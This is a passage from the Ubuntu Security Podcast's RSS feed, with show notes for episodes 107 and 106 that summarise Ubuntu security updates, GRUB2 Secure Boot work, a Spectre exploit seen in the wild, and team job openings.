<h4 id="apparmor-security-engineer">AppArmor Security Engineer</h4>
<ul>
<li><a href="https://canonical.com/careers/2114847/apparmor-security-engineer-remote">https://canonical.com/careers/2114847/apparmor-security-engineer-remote</a></li>
</ul>
<h4 id="ubuntu-security-engineer">Ubuntu Security Engineer</h4>
<ul>
<li><a href="https://canonical.com/careers/2612092/ubuntu-security-engineer-remote">https://canonical.com/careers/2612092/ubuntu-security-engineer-remote</a>
<!-- raw HTML omitted -->
</li>
</ul>
<h4 id="security-engineer-ubuntu">Security Engineer - Ubuntu</h4>
<ul>
<li><a href="https://canonical.com/careers/2925180/security-engineer-ubuntu-remote">https://canonical.com/careers/2925180/security-engineer-ubuntu-remote</a>
<!-- raw HTML omitted -->
</li>
</ul>
<h2 id="get-in-contact">Get in contact</h2>
<ul>
<li><a href="mailto:security@ubuntu.com">security@ubuntu.com</a></li>
<li><a href="https://libera.chat">#ubuntu-security on the Libera.Chat IRC network</a></li>
<li><a href="https://lists.ubuntu.com/mailman/listinfo/ubuntu-hardened">ubuntu-hardened mailing list</a></li>
<li><a href="https://discourse.ubuntu.com/c/security">Security section on discourse.ubuntu.com</a></li>
<li><a href="https://twitter.com/ubuntu_sec">@ubuntu_sec on twitter</a></li>
</ul>
]]></content:encoded><itunes:image href="https://ubuntusecuritypodcast.org/img/usp_logo_500.png"></itunes:image>
          <googleplay:image href="https://ubuntusecuritypodcast.org/img/usp_logo_500.png"></googleplay:image><enclosure url="https://people.canonical.com/~amurray/USP/USP_E108.mp3" length="9207076" type="audio/mpeg" /><itunes:duration>11:48</itunes:duration><itunes:explicit>false</itunes:explicit>
          <googleplay:explicit>no</googleplay:explicit></item>
        <item>
          
            <title>Episode 107
          
          
          </title>
          <link>https://ubuntusecuritypodcast.org/episode-107/</link>
          <pubDate>Fri, 12 Mar 2021 15:49:00 +1030 </pubDate>
          <dc:creator></dc:creator>
          <guid>2cff740070f0e2f9d66336b177a65b768ba592f6c389400d1bd35808ec13ec1a85b09ed142cbf3988051d22a43410be8c82254dacf8d288e78866c45aa0d215c</guid>
          <itunes:author>Ubuntu Security Team</itunes:author>
          
        
          <itunes:title>Episode 107</itunes:title>
        
        <itunes:subtitle><![CDATA[
        
          This week we check on the status of the pending GRUB2 Secure Boot updates
  and detail some open positions within the team, plus we look at security
  updates for GLib, zstd, Go, Git and more.
  
        
        ]]></itunes:subtitle>
        <itunes:summary>  This week we check on the status of the pending GRUB2 Secure Boot updates
  and detail some open positions within the team, plus we look at security
  updates for GLib, zstd, Go, Git and more.
  </itunes:summary>
        <description>  This week we check on the status of the pending GRUB2 Secure Boot updates
  and detail some open positions within the team, plus we look at security
  updates for GLib, zstd, Go, Git and more.
  </description>
        <googleplay:description>  This week we check on the status of the pending GRUB2 Secure Boot updates
  and detail some open positions within the team, plus we look at security
  updates for GLib, zstd, Go, Git and more.
  </googleplay:description>
        <content:encoded><![CDATA[<h2 id="overview">Overview</h2>
<p>This week we check on the status of the pending GRUB2 Secure Boot updates
and detail some open positions within the team, plus we look at security
updates for GLib, zstd, Go, Git and more.</p>
<h2 id="this-week-in-ubuntu-security-updates">This week in Ubuntu Security Updates</h2>
<p>7 unique CVEs addressed</p>
<h3 id="usn-4757-2-wpa-supplicant-and-hostapd-vulnerability-00-45">[<a href="https://ubuntu.com/security/notices/USN-4757-2">USN-4757-2</a>] wpa_supplicant and hostapd vulnerability [00:45]</h3>
<ul>
<li>1 CVEs addressed in Trusty ESM (14.04 ESM)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2021-27803">CVE-2021-27803</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>P2P/wifi direct UAF -&gt; crash, RCE from <a href="https://ubuntusecuritypodcast.org/episode-106/">Episode 106</a></li>
</ul>
<h3 id="usn-4733-2-gnome-autoar-regression-01-23">[<a href="https://ubuntu.com/security/notices/USN-4733-2">USN-4733-2</a>] GNOME Autoar regression [01:23]</h3>
<ul>
<li>Affecting Bionic (18.04 LTS), Focal (20.04 LTS), Groovy (20.10)</li>
<li><a href="https://ubuntusecuritypodcast.org/episode-104/">Episode 104</a> - upstream patch caused a regression such that folders within
the archive may fail to be extracted - once noticed and fixed by upstream
we have now included this too</li>
</ul>
<h3 id="usn-4759-1-glib-vulnerabilities-02-06">[<a href="https://ubuntu.com/security/notices/USN-4759-1">USN-4759-1</a>] GLib vulnerabilities [02:06]</h3>
<ul>
<li>2 CVEs addressed in Xenial (16.04 LTS), Bionic (18.04 LTS), Focal (20.04 LTS), Groovy (20.10)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2021-27219">CVE-2021-27219</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-27218">CVE-2021-27218</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>Possible integer overflow when allocation memory due to implicit cast
from a 64-bit long to a 32-bit int when allocating memory - g_memdup()
function takes an 32-bit int argument but is called by g_bytes_new()
which takes a gsize 64-bit argument. Ends up allocating much less memory
than expected, then later when this is copied into a buffer overflow can
occur.</li>
<li>Since g_memdup() is a public API, can&rsquo;t just change it to take a gsize as
argument since this would break the ABI - so instead added g_memdup2()
and converted internal callers to use this - but other applications
should think about porting to this new API to avoid this sort of issue
(and audit their own code to check they don&rsquo;t have similar implicit
integer overflow issues)</li>
</ul>
<h3 id="usn-4760-1-libzstd-vulnerabilities-04-44">[<a href="https://ubuntu.com/security/notices/USN-4760-1">USN-4760-1</a>] libzstd vulnerabilities [04:44]</h3>
<ul>
<li>2 CVEs addressed in Bionic (18.04 LTS), Focal (20.04 LTS), Groovy (20.10)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2021-24032">CVE-2021-24032</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-24031">CVE-2021-24031</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>Files created with default permissions - so was patched to chmod() so
only owner could read/write them</li>
<li>But this introduced a race condition where the file initially still has
the default permissions so a different user could potentially access it
during that time until the chmod() call is made - so was deemed an
incomplete fix for the first CVE - second CVE allocated for this
incomplete fix - instead changed to set umask() before creating the file
in the first place so permissions get set properly at creation</li>
</ul>
<h3 id="usn-4758-1-go-vulnerability-05-41">[<a href="https://ubuntu.com/security/notices/USN-4758-1">USN-4758-1</a>] Go vulnerability [05:41]</h3>
<ul>
<li>1 CVEs addressed in Xenial (16.04 LTS), Bionic (18.04 LTS), Focal (20.04 LTS), Groovy (20.10)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2020-24553">CVE-2020-24553</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>Possible XSS issue in CGI and FastCGI impl since go would treat non-HTML
data as HTML and so would return a text/html content-type which would
then be served as such by the webserver even if it had been uploaded with
a different content type</li>
<li>Thanks to Dariusz Gadomski from SEG team for preparing these fixes (since
these versions of golang are in universe on these Ubuntu releases)</li>
</ul>
<h3 id="usn-4761-1-git-vulnerability-06-59">[<a href="https://ubuntu.com/security/notices/USN-4761-1">USN-4761-1</a>] Git vulnerability [06:59]</h3>
<ul>
<li>1 CVEs addressed in Xenial (16.04 LTS), Bionic (18.04 LTS), Focal (20.04 LTS), Groovy (20.10)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2021-21300">CVE-2021-21300</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>Possible code execution by local git client when cloning a malicious
remote repository - local client would need a git filter to be
installed - like git LFS - and would have to be on a case-insensitive
file-system - so would be a more common scenario for Windows users but
unlikely to affect Linux users - patched anyway</li>
</ul>
<h2 id="goings-on-in-ubuntu-security-community">Goings on in Ubuntu Security Community</h2>
<h3 id="grub2-updates-still-in-progress-08-54">GRUB2 updates still in progress [08:54]</h3>
<ul>
<li>Still being tested internally by our hardware certification lab and
others and some minor tweaks being made, plus shim devel work is still
ongoing, thanks to Dimitri John Ledkov from Foundations team for handling
that work, as well as all the one-grub work too</li>
</ul>
<h3 id="hiring-09-53">Hiring [09:53]</h3>
<h4 id="apparmor-security-engineer">AppArmor Security Engineer</h4>
<ul>
<li><a href="https://canonical.com/careers/2114847/apparmor-security-engineer-remote">https://canonical.com/careers/2114847/apparmor-security-engineer-remote</a></li>
</ul>
<h4 id="ubuntu-security-engineer">Ubuntu Security Engineer</h4>
<ul>
<li><a href="https://canonical.com/careers/2612092/ubuntu-security-engineer-remote">https://canonical.com/careers/2612092/ubuntu-security-engineer-remote</a>
<!-- raw HTML omitted -->
</li>
</ul>
<h4 id="security-engineer-ubuntu">Security Engineer - Ubuntu</h4>
<ul>
<li><a href="https://canonical.com/careers/2925180/security-engineer-ubuntu-remote">https://canonical.com/careers/2925180/security-engineer-ubuntu-remote</a>
<!-- raw HTML omitted -->
</li>
</ul>
<h2 id="get-in-contact">Get in contact</h2>
<ul>
<li><a href="mailto:security@ubuntu.com">security@ubuntu.com</a></li>
<li><a href="https://libera.chat">#ubuntu-security on the Libera.Chat IRC network</a></li>
<li><a href="https://lists.ubuntu.com/mailman/listinfo/ubuntu-hardened">ubuntu-hardened mailing list</a></li>
<li><a href="https://discourse.ubuntu.com/c/security">Security section on discourse.ubuntu.com</a></li>
<li><a href="https://twitter.com/ubuntu_sec">@ubuntu_sec on twitter</a></li>
</ul>
]]></content:encoded><itunes:image href="https://ubuntusecuritypodcast.org/img/usp_logo_500.png"></itunes:image>
          <googleplay:image href="https://ubuntusecuritypodcast.org/img/usp_logo_500.png"></googleplay:image><enclosure url="https://people.canonical.com/~amurray/USP/USP_E107.mp3" length="9803443" type="audio/mpeg" /><itunes:duration>12:04</itunes:duration><itunes:explicit>false</itunes:explicit>
          <googleplay:explicit>no</googleplay:explicit></item>
        <item>
          
            <title>Episode 106
          
          
          </title>
          <link>https://ubuntusecuritypodcast.org/episode-106/</link>
          <pubDate>Thu, 04 Mar 2021 15:38:00 +1030 </pubDate>
          <dc:creator></dc:creator>
          <guid>85ce611b78e86ab697836030bbe87fac13492f26f69c3e578cdd3d689bd2801603926023f74a31e4ad4b1303355e3c838eb34f5461543ec773c8e7466906ff0f</guid>
          <itunes:author>Ubuntu Security Team</itunes:author>
          
        
          <itunes:title>Episode 106</itunes:title>
        
        <itunes:subtitle><![CDATA[
        
          This week we talk about more BootHole-like vulnerabilities in GRUB2, a
  Spectre exploit found in-the-wild, security updates for xterm, screen,
  Python, wpa_supplicant and more.
  
        
        ]]></itunes:subtitle>
        <itunes:summary>  This week we talk about more BootHole-like vulnerabilities in GRUB2, a
  Spectre exploit found in-the-wild, security updates for xterm, screen,
  Python, wpa_supplicant and more.
  </itunes:summary>
        <description>  This week we talk about more BootHole-like vulnerabilities in GRUB2, a
  Spectre exploit found in-the-wild, security updates for xterm, screen,
  Python, wpa_supplicant and more.
  </description>
        <googleplay:description>  This week we talk about more BootHole-like vulnerabilities in GRUB2, a
  Spectre exploit found in-the-wild, security updates for xterm, screen,
  Python, wpa_supplicant and more.
  </googleplay:description>
        <content:encoded><![CDATA[<h2 id="overview">Overview</h2>
<p>This week we talk about more BootHole-like vulnerabilities in GRUB2, a
Spectre exploit found in-the-wild, security updates for xterm, screen,
Python, wpa_supplicant and more.</p>
<h2 id="this-week-in-ubuntu-security-updates">This week in Ubuntu Security Updates</h2>
<p>52 unique CVEs addressed</p>
<h3 id="usn-4698-2-dnsmasq-regression-00-44">[<a href="https://ubuntu.com/security/notices/USN-4698-2">USN-4698-2</a>] Dnsmasq regression [00:44]</h3>
<ul>
<li>8 CVEs addressed in Xenial (16.04 LTS), Bionic (18.04 LTS), Focal (20.04 LTS), Groovy (20.10)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2019-14834">CVE-2019-14834</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-25686">CVE-2020-25686</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-25685">CVE-2020-25685</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-25684">CVE-2020-25684</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-25683">CVE-2020-25683</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-25682">CVE-2020-25682</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-25687">CVE-2020-25687</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-25681">CVE-2020-25681</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>Relates to a dnsmasq update done back in January - upstream fixes results
in regressions in some network environments - backported the resulting
additional fixes from upstream to resolve these</li>
</ul>
<h3 id="usn-4746-1-xterm-vulnerability-01-14">[<a href="https://ubuntu.com/security/notices/USN-4746-1">USN-4746-1</a>] xterm vulnerability [01:14]</h3>
<ul>
<li>1 CVEs addressed in Xenial (16.04 LTS), Bionic (18.04 LTS), Focal (20.04 LTS), Groovy (20.10)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2021-27135">CVE-2021 -27135</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>taviso - crafted UTF-8 could cause a crash - related to very similar bug
in screen</li>
</ul>
<h3 id="usn-4747-1-usn-4747-2-gnu-screen-vulnerability">[<a href="https://ubuntu.com/security/notices/USN-4747-1">USN-4747-1</a>, <a href="https://ubuntu.com/security/notices/USN-4747-2">USN-4747-2</a>] GNU Screen vulnerability</h3>
<ul>
<li>1 CVEs addressed in Trusty ESM (14.04 ESM), Xenial (16.04 LTS), Bionic (18.04 LTS), Focal (20.04 LTS), Groovy (20.10)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2021-26937">CVE-2021-26937</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>Crash in screen from crafted UTF-8 - found by users crashing a minecraft
server with this crafted content - ? - server was running under screen so
would log this crafted content - screen dies, minecraft server dies -
lots of tutorials for running a minecraft server mention to run it under
screen so this is a common thing apparently</li>
</ul>
<h3 id="usn-4748-1-linux-kernel-vulnerabilities-02-54">[<a href="https://ubuntu.com/security/notices/USN-4748-1">USN-4748-1</a>] Linux kernel vulnerabilities [02:54]</h3>
<ul>
<li>5 CVEs addressed in Trusty ESM (14.04 ESM), Xenial (16.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2020-29661">CVE-2020-29661</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-29660">CVE-2020-29660</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-29568">CVE-2020-29568</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-29374">CVE-2020-29374</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-27815">CVE-2020-27815</a> <!-- raw HTML omitted --></li>
</ul>
</li>
</ul>
<h3 id="usn-4749-1-linux-kernel-vulnerabilities">[<a href="https://ubuntu.com/security/notices/USN-4749-1">USN-4749-1</a>] Linux kernel vulnerabilities</h3>
<ul>
<li>9 CVEs addressed in Trusty ESM (14.04 ESM), Xenial (16.04 LTS), Bionic (18.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2020-29661">CVE-2020-29661</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-29660">CVE-2020-29660</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-29569">CVE-2020-29569</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-29568">CVE-2020-29568</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-29374">CVE-2020-29374</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-28941">CVE-2020-28941</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-27830">CVE-2020-27830</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-27815">CVE-2020-27815</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-25669">CVE-2020-25669</a> <!-- raw HTML omitted --></li>
</ul>
</li>
</ul>
<h3 id="usn-4750-1-linux-kernel-vulnerabilities">[<a href="https://ubuntu.com/security/notices/USN-4750-1">USN-4750-1</a>] Linux kernel vulnerabilities</h3>
<ul>
<li>10 CVEs addressed in Bionic (18.04 LTS), Focal (20.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2021-20177">CVE-2021-20177</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-29661">CVE-2020-29661</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-29660">CVE-2020-29660</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-29569">CVE-2020-29569</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-29568">CVE-2020-29568</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-28588">CVE-2020-28588</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-28941">CVE-2020-28941</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-27830">CVE-2020-27830</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-27815">CVE-2020-27815</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-25669">CVE-2020-25669</a> <!-- raw HTML omitted --></li>
</ul>
</li>
</ul>
<h3 id="usn-4751-1-linux-kernel-vulnerabilities">[<a href="https://ubuntu.com/security/notices/USN-4751-1">USN-4751-1</a>] Linux kernel vulnerabilities</h3>
<ul>
<li>18 CVEs addressed in Focal (20.04 LTS), Groovy (20.10)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2020-35508">CVE-2020-35508</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-29661">CVE-2020-29661</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-29660">CVE-2020-29660</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-29569">CVE-2020-29569</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-29568">CVE-2020-29568</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-28974">CVE-2020-28974</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-28588">CVE-2020-28588</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-27835">CVE-2020-27835</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-28941">CVE-2020-28941</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-27830">CVE-2020-27830</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-27815">CVE-2020-27815</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-27777">CVE-2020-27777</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-27675">CVE-2020-27675</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-27673">CVE-2020-27673</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-25704">CVE-2020-25704</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-25669">CVE-2020-25669</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-25668">CVE-2020-25668</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-25656">CVE-2020-25656</a> <!-- raw HTML omitted --></li>
</ul>
</li>
</ul>
<h3 id="usn-4752-1-linux-kernel--oem--vulnerabilities">[<a href="https://ubuntu.com/security/notices/USN-4752-1">USN-4752-1</a>] Linux kernel (OEM) vulnerabilities</h3>
<ul>
<li>20 CVEs addressed in Focal (20.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2020-35508">CVE-2020-35508</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-29661">CVE-2020-29661</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-29660">CVE-2020-29660</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-29371">CVE-2020-29371</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-29369">CVE-2020-29369</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-29368">CVE-2020-29368</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-28915">CVE-2020-28915</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-28588">CVE-2020-28588</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-27815">CVE-2020-27815</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-27152">CVE-2020-27152</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-25704">CVE-2020-25704</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-25643">CVE-2020-25643</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-25641">CVE-2020-25641</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-25284">CVE-2020-25284</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-25212">CVE-2020-25212</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-24490">CVE-2020-24490</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-15437">CVE-2020-15437</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-15436">CVE-2020-15436</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-14314">CVE-2020-14314</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-10135">CVE-2020-10135</a> <!-- raw HTML omitted --></li>
</ul>
</li>
</ul>
<h3 id="usn-4753-1-linux-kernel--oem--vulnerability">[<a href="https://ubuntu.com/security/notices/USN-4753-1">USN-4753-1</a>] Linux kernel (OEM) vulnerability</h3>
<ul>
<li>2 CVEs addressed in Focal (20.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2021-3178">CVE-2021-3178</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-28374">CVE-2020-28374</a> <!-- raw HTML omitted --></li>
</ul>
</li>
</ul>
<h3 id="usn-4754-1-python-vulnerabilities-03-07">[<a href="https://ubuntu.com/security/notices/USN-4754-1">USN-4754-1</a>] Python vulnerabilities [03:07]</h3>
<ul>
<li>2 CVEs addressed in Trusty ESM (14.04 ESM), Xenial (16.04 LTS), Bionic (18.04 LTS), Focal (20.04 LTS), Groovy (20.10)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2021-3177">CVE-2021-3177</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-27619">CVE-2020-27619</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>unsafe sprintf() call to format doubles - heap buffer overflow - BUT on
Ubuntu Python (like the vast majority of the archive) is compiled with
FORTIFY_SOURCE - just one of various hardening features - so can detect
some buffer overflows at runtime - turns this into a DoS</li>
<li>test code calls eval on content received via HTTP - so if ran the tests
and someone could interpose on connection, could get RCE</li>
</ul>
<h3 id="usn-4754-2-python-regression">[<a href="https://ubuntu.com/security/notices/USN-4754-2">USN-4754-2</a>] Python regression</h3>
<ul>
<li>2 CVEs addressed in Trusty ESM (14.04 ESM), Xenial (16.04 LTS), Bionic (18.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2020-27619">CVE-2020-27619</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-3177">CVE-2021-3177</a> <!-- raw HTML omitted --></li>
</ul>
</li>
</ul>
<h3 id="usn-4754-4-python-2-dot-7-vulnerability">[<a href="https://ubuntu.com/security/notices/USN-4754-4">USN-4754-4</a>] Python 2.7 vulnerability</h3>
<ul>
<li>2 CVEs addressed in Xenial (16.04 LTS), Bionic (18.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2020-27619">CVE-2020-27619</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-3177">CVE-2021-3177</a> <!-- raw HTML omitted --></li>
</ul>
</li>
</ul>
<h3 id="usn-4755-1-libtiff-vulnerabilities-04-21">[<a href="https://ubuntu.com/security/notices/USN-4755-1">USN-4755-1</a>] LibTIFF vulnerabilities [04:21]</h3>
<ul>
<li>2 CVEs addressed in Xenial (16.04 LTS), Bionic (18.04 LTS), Focal (20.04 LTS), Groovy (20.10)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2020-35524">CVE-2020-35524</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-35523">CVE-2020-35523</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>Heap buffer overflow in tiff2pdf tool and integer overflow -&gt; buffer
overflow from crafted tiff file input</li>
</ul>
<h3 id="usn-4737-2-bind-vulnerability-04-39">[<a href="https://ubuntu.com/security/notices/USN-4737-2">USN-4737-2</a>] Bind vulnerability [04:39]</h3>
<ul>
<li>1 CVEs addressed in Precise ESM (12.04 ESM), Trusty ESM (14.04 ESM)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2020-8625">CVE-2020-8625</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li><a href="https://ubuntusecuritypodcast.org/episode-105/">Episode 105</a></li>
</ul>
<h3 id="usn-4757-1-wpa-supplicant-and-hostapd-vulnerability-04-53">[<a href="https://ubuntu.com/security/notices/USN-4757-1">USN-4757-1</a>] wpa_supplicant and hostapd vulnerability [04:53]</h3>
<ul>
<li>1 CVEs addressed in Xenial (16.04 LTS), Bionic (18.04 LTS), Focal (20.04 LTS), Groovy (20.10)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2021-27803">CVE-2021-27803</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>When using P2P could result in a UAF -&gt; crash or possible RCE from a
remote user within local radio range</li>
</ul>
<h2 id="goings-on-in-ubuntu-security-community">Goings on in Ubuntu Security Community</h2>
<h3 id="grub2-secure-boot-bypass-2021-05-31">GRUB2 Secure Boot Bypass 2021 [05:31]</h3>
<ul>
<li><a href="https://ubuntu.com/blog/grub2-secure-boot-bypass-2021">https://ubuntu.com/blog/grub2-secure-boot-bypass-2021</a></li>
<li><a href="https://wiki.ubuntu.com/SecurityTeam/KnowledgeBase/GRUB2SecureBootBypass2021">https://wiki.ubuntu.com/SecurityTeam/KnowledgeBase/GRUB2SecureBootBypass2021</a></li>
<li><a href="https://discourse.ubuntu.com/t/grub2-secureboot-bypass-2021-and-one-grub/21200">https://discourse.ubuntu.com/t/grub2-secureboot-bypass-2021-and-one-grub/21200</a></li>
</ul>
<h3 id="first-spectre-exploit-discovered-in-the-wild-09-47">First Spectre Exploit discovered in the wild [09:47]</h3>
<ul>
<li><a href="https://dustri.org/b/spectre-exploits-in-the-wild.html">https://dustri.org/b/spectre-exploits-in-the-wild.html</a></li>
<li>Uploaded to VT last month - not the first artefacts the use Spectre to be
uploaded - back in 2018 the original PoCs and various variants thereof
were uploaded to VT but these were all benign.</li>
<li>This one is a real exploit with versions targeting Windows and Linux -
the Linux variant reads /etc/shadow by default - it does this by spawning
a call to su to get the file paged into memory, then by walking in-kernel
file-system structures through their spec exec read gadget to eventually
read and dump out the file</li>
<li>Was developed by Immunity as part of their CANVAS tool
(<a href="https://vimeo.com/271127615">https://vimeo.com/271127615</a>)</li>
</ul>
<h3 id="linux-mint-to-more-forcefully-encourage-security-updates-be-installed-12-02">Linux Mint to more forcefully encourage security updates be installed [12:02]</h3>
<ul>
<li><a href="https://blog.linuxmint.com/?p=4037">https://blog.linuxmint.com/?p=4037</a></li>
<li>Update manager will track metrics, can then detect cases where updates
are overlooked, remind or even insist to apply updates</li>
<li>Focus on not getting in the way, here to help, employ smart patters and
usages, will be configurable etc</li>
<li>Still forming strategies but space to watch</li>
</ul>
<h2 id="get-in-contact">Get in contact</h2>
<ul>
<li><a href="mailto:security@ubuntu.com">security@ubuntu.com</a></li>
<li><a href="https://libera.chat">#ubuntu-security on the Libera.Chat IRC network</a></li>
<li><a href="https://lists.ubuntu.com/mailman/listinfo/ubuntu-hardened">ubuntu-hardened mailing list</a></li>
<li><a href="https://discourse.ubuntu.com/c/security">Security section on discourse.ubuntu.com</a></li>
<li><a href="https://twitter.com/ubuntu_sec">@ubuntu_sec on twitter</a></li>
</ul>
]]></content:encoded><itunes:image href="https://ubuntusecuritypodcast.org/img/usp_logo_500.png"></itunes:image>
          <googleplay:image href="https://ubuntusecuritypodcast.org/img/usp_logo_500.png"></googleplay:image><enclosure url="https://people.canonical.com/~amurray/USP/USP_E106.mp3" length="11510651" type="audio/mpeg" /><itunes:duration>14:00</itunes:duration><itunes:explicit>false</itunes:explicit>
          <googleplay:explicit>no</googleplay:explicit></item>
        <item>
          
            <title>Episode 105
          
          
          </title>
          <link>https://ubuntusecuritypodcast.org/episode-105/</link>
          <pubDate>Thu, 25 Feb 2021 15:38:00 +1030 </pubDate>
